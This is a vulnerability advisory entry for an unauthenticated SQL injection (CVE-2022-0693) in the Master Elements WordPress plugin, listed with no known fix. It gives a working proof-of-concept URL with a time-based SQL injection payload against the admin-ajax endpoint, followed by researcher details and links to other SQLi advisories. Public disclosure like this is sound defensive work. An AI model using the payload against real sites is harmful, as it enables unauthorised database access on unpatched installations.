Master Elements <= 8.0 – Unauthenticated SQLi | CVE 2022-0693 | Plugin Vulnerabilities

Description

The plugin does not validate and escape the meta_ids parameter of its remove_post_meta_condition AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL Injection

Proof of Concept

As unauthenticated:

https://example.com/wp-admin/admin-ajax.php?meta_ids=1)%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b&action=remove_post_meta_condition

Affects Plugins

master-elements

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

a72bf075-fd4b-4aa5-b4a4-5f62a0620643

Timeline

Publicly Published

2022-03-29 (about 3 years ago)

Added

2022-03-29 (about 3 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2025-07-03

Title

Printcart Web to Print Product Designer for WooCommerce < 2.4.1 - Subscriber+ SQLi

Published

2018-05-27

Title

Membermouse < 2.2.9 - Blind SQL Injection

Published

2016-08-16

Title

Ninja Forms <= 2.9.55.1 - Authenticated SQL Injection

Published

2022-11-02

Title

OWM Weather < 5.6.9 - Contributor+ SQLi

Published

2018-01-06

Title

WpJobBoard < 4.5 - Multiple SQL Injections